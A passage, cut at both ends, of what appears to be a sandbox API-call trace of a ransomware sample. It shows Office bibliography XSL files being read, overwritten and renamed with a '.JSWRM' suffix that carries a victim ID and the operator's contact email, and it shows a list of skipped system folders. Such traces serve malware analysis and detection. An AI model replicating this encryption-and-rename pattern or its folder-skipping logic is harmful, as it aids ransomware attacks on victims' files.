lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x27100, lpOverlapped=0x0) returned 1 [0128.677] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.677] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x27100, lpOverlapped=0x0) returned 1 [0128.678] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0128.678] CloseHandle (hObject=0x314) returned 1 [0128.678] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0128.678] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0128.678] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0128.678] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0128.678] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0128.678] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0128.678] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0128.678] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0128.678] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0128.678] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0128.678] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0128.678] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e688 [0128.678] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0128.678] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0128.678] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Bibliography\\Style\\GostName.XSL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\bibliography\\style\\gostname.xsl"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Bibliography\\Style\\GostName.XSL.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\bibliography\\style\\gostname.xsl.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0128.680] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e688 | out: hHeap=0x1e0000) returned 1 [0128.680] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0128.680] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0128.680] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0128.680] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GostTitle.XSL", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0128.680] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GostTitle.XSL", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GostTitle.XSL", lpUsedDefaultChar=0x0) returned 13 [0128.680] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0128.680] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0128.680] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GostTitle.XSL", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0128.680] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GostTitle.XSL", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GostTitle.XSL", lpUsedDefaultChar=0x0) returned 13 [0128.680] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0128.680] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0128.680] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0128.680] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0128.680] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0128.680] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0128.680] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Bibliography\\Style\\GostTitle.XSL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\bibliography\\style\\gosttitle.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0128.681] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=251449) returned 1 [0128.681] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.681] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2501e8 [0128.681] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x27100, lpOverlapped=0x0) returned 1 [0128.693] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.693] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x27100, lpOverlapped=0x0) returned 1 [0128.693] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0128.693] CloseHandle (hObject=0x314) returned 1 [0128.693] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0128.693] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0128.693] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0128.693] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0128.693] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0128.693] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0128.693] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0128.693] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0128.693] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0128.694] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0128.694] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0128.694] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e458 [0128.694] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0128.694] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0128.694] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Bibliography\\Style\\GostTitle.XSL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\bibliography\\style\\gosttitle.xsl"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Bibliography\\Style\\GostTitle.XSL.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\bibliography\\style\\gosttitle.xsl.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0128.695] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e458 | out: hHeap=0x1e0000) returned 1 [0128.695] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0128.695] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0128.695] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c328 [0128.695] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HarvardAnglia2008OfficeOnline.xsl", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0128.695] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0128.695] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HarvardAnglia2008OfficeOnline.xsl", cchWideChar=33, lpMultiByteStr=0x22cdc8, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HarvardAnglia2008OfficeOnline.xsl", lpUsedDefaultChar=0x0) returned 33 [0128.695] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c328 | out: hHeap=0x1e0000) returned 1 [0128.695] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0128.695] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HarvardAnglia2008OfficeOnline.xsl", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0128.695] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0128.695] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HarvardAnglia2008OfficeOnline.xsl", cchWideChar=33, lpMultiByteStr=0x22ce70, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HarvardAnglia2008OfficeOnline.xsl", lpUsedDefaultChar=0x0) returned 33 [0128.695] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0128.695] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f0d8 [0128.695] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0128.695] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0128.695] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0128.695] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0128.695] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Bibliography\\Style\\HarvardAnglia2008OfficeOnline.xsl" (normalized: "c:\\program files\\microsoft office\\root\\office16\\bibliography\\style\\harvardanglia2008officeonline.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0128.696] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=284802) returned 1 [0128.696] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.696] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2501e8 [0128.696] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x27100, lpOverlapped=0x0) returned 1 [0128.708] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.708] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x27100, lpOverlapped=0x0) returned 1 [0128.709] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0128.709] CloseHandle (hObject=0x314) returned 1 [0128.709] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22eca0 [0128.709] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0128.709] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0128.709] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0128.709] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0128.709] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0128.709] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0128.709] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a330 [0128.709] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a330, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0128.709] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a330 | out: hHeap=0x1e0000) returned 1 [0128.709] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bad8 [0128.709] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0128.709] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bad8 | out: hHeap=0x1e0000) returned 1 [0128.709] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0128.709] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Bibliography\\Style\\HarvardAnglia2008OfficeOnline.xsl" (normalized: "c:\\program files\\microsoft office\\root\\office16\\bibliography\\style\\harvardanglia2008officeonline.xsl"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Bibliography\\Style\\HarvardAnglia2008OfficeOnline.xsl.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\bibliography\\style\\harvardanglia2008officeonline.xsl.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0128.710] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0128.710] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22eca0 | out: hHeap=0x1e0000) returned 1 [0128.710] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0128.710] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0128.710] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0128.710] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0128.710] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IEEE2006OfficeOnline.xsl", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0128.710] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0128.710] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IEEE2006OfficeOnline.xsl", cchWideChar=24, lpMultiByteStr=0x240fe8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IEEE2006OfficeOnline.xsl", lpUsedDefaultChar=0x0) returned 24 [0128.710] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0128.710] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0128.710] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IEEE2006OfficeOnline.xsl", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0128.710] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0128.710] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IEEE2006OfficeOnline.xsl", cchWideChar=24, lpMultiByteStr=0x2410d8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IEEE2006OfficeOnline.xsl", lpUsedDefaultChar=0x0) returned 24 [0128.711] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0128.711] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b6a0 [0128.711] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f0d8 | out: hHeap=0x1e0000) returned 1 [0128.711] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0128.711] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0128.711] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bc18 [0128.711] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Bibliography\\Style\\IEEE2006OfficeOnline.xsl" (normalized: "c:\\program files\\microsoft office\\root\\office16\\bibliography\\style\\ieee2006officeonline.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0128.712] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=294525) returned 1 [0128.712] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.712] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2501e8 [0128.712] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x27100, lpOverlapped=0x0) returned 1 [0128.741] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.741] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x27100, lpOverlapped=0x0) returned 1 [0128.742] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0128.742] CloseHandle (hObject=0x314) returned 1 [0128.742] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24ba88 [0128.742] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0128.742] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0128.742] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0128.742] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0128.742] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0128.742] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0128.742] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0128.742] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0128.742] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0128.742] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22eca0 [0128.742] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x24fc48 [0128.742] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22eca0 | out: hHeap=0x1e0000) returned 1 [0128.742] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0128.742] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Bibliography\\Style\\IEEE2006OfficeOnline.xsl" (normalized: "c:\\program files\\microsoft office\\root\\office16\\bibliography\\style\\ieee2006officeonline.xsl"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Bibliography\\Style\\IEEE2006OfficeOnline.xsl.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\bibliography\\style\\ieee2006officeonline.xsl.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0128.743] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24fc48 | out: hHeap=0x1e0000) returned 1 [0128.743] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ba88 | out: hHeap=0x1e0000) returned 1 [0128.744] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bc18 | out: hHeap=0x1e0000) returned 1 [0128.744] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0128.744] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0128.744] lstrcmpiW (lpString1="ISO690.XSL", lpString2=".") returned 1 [0128.744] lstrcmpiW (lpString1="ISO690.XSL", lpString2="..") returned 1 [0128.744] lstrcmpiW (lpString1="ISO690.XSL", lpString2="...") returned 1 [0128.744] lstrcmpiW (lpString1="ISO690.XSL", lpString2="windows") returned -1 [0128.744] lstrcmpiW (lpString1="ISO690.XSL", lpString2="recovery") returned -1 [0128.745] lstrcmpiW (lpString1="ISO690.XSL", lpString2="perflogs") returned -1 [0128.745] lstrcmpiW (lpString1="ISO690.XSL", lpString2="documents and settings") returned 1 [0128.745] lstrcmpiW (lpString1="ISO690.XSL", lpString2="$RECYCLE.BIN") returned 1 [0128.745] lstrcmpiW (lpString1="ISO690.XSL", lpString2="system volume information") returned -1 [0128.745] lstrcmpiW (lpString1="ISO690.XSL", lpString2="msocache") returned -1 [0128.745] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0128.745] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ISO690.XSL", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0128.745] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ISO690.XSL", cchWideChar=10, lpMultiByteStr=0x345e870, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 